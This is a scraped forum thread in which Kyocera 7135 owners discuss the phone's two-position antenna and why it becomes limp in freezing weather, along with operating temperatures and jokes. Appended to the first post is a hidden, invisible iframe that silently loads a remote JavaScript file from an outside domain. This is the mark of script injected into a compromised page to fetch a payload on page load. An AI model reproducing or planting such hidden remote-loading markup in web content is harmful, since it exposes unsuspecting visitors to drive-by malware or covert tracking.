+ Reply to Thread

Thread: Broken antena?

Broken antena?

Just received mine today, haven't yet activated it though.

During my intial "playing around" time, i noticed that when i extend the antena it has two open positions. however, the fully extended position seems to be with the inside casing exposed.

is this normal, or do i have something wrong with my unit. when fully extended there are two metal areas exposed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not broken, that's the way it works.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

I have noticed something very strange about my 7135's antenna... At room temperature and quite a bit colder, the antenna is stiff and normal, but when I use my phone in very cold temperatures (i.e. -10 to +20 degrees) the metal antenna gets totally limp, almost string-like! Very strange anyone else experienced this?

I'm totally serious and don't want any junior high Beavis & Buttheadesque comments.
    ~'kito
    pdaPhoneHome Moderator

Limp antenna

It was 10 degrees F. here last month and to improve reception I extended the antenna from my pack and looked down to see it bent in half. Wow, I thought. thats not right! I wonder how it is constructed ?

Originally posted by tmwebsites
    Not broken, that's the way it works.
    thanks, that's good to know

You shouldn't even be using this "mini-computer" in 10 degree weather. I'm sure that's outside it's operating range.

The range for this phone is 15-130 degrees F. You can use in lower temps however you run the rist of freezinf the fluid in the LCD. This does happen. I was on vacaion in Alaska and my Palm, not my 7135, had it's screen frozen. It is quite pretty, however, the screen needed to be replaced. It cracked some of the glass inside. Just be carefull. Keep the clamshell closed as much as possible and in your pocket. On the antena thing, mine stayed good. No limp, no string. Not sure.

Good Luck!

Steve

Originally posted by 7135man
    The range for this phone is 15-130 degrees F. You can use in lower temps however you run the rist of freezinf the fluid in the LCD. This does happen. I was on vacaion in Alaska and my Palm, not my 7135, had it's screen frozen. It is quite pretty, however, the screen needed to be replaced. It cracked some of the glass inside. Just be carefull. Keep the clamshell closed as much as possible and in your pocket. On the antena thing, mine stayed good. No limp, no string. Not sure.

Good Luck!

Steve
    You the man, 7135man! Thanks for validating my comment, I was kind of taking a guess on the operating range. But since where I live I only have to worry about the high side of that range, I can't relate to you folks in the frozen tundra areas of the country.

Originally posted by Peter
    You shouldn't even be using this "mini-computer" in 10 degree weather. I'm sure that's outside it's operating range.
    So what are you saying? We Minnesotans shouldn't be allowed to use our 7135s?

During the winters I am in -10 to +20 degree temps all the time and nothing bad has ever happened to the electronics. But it is odd that the hard metal antenna becomes stringlike in very cold temps. I would have thought that it would become even more rigid in cold, rather than the opposite. Luckily, when it warms up it is right back to normal. Strange material.
    ~'kito
    pdaPhoneHome Moderator

I was talking to my brother about the limp antenna in cold weather and he grabbed one of those cans of compressed air used to dust off stuff and sprayed it at the extended antenna on his, the skinny plastic looking part. Once it was really cold he could bend it over easily. When it warmed up (he stroked it with his fingers) it got stiff and straight again.

It was really kind of funny, especially with the sound affects he was making. LOL
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

...like a frightened turtle!!!

</seinfeld>
    LART 'em all! Let /root grep 'em out!

Limp antenna is made of

So what is it made of? Surely one of you palm surgeons can figure it out. My bet is that it is either a reverse chiral of bovine penile tissue or maybe something like uh... kevlar?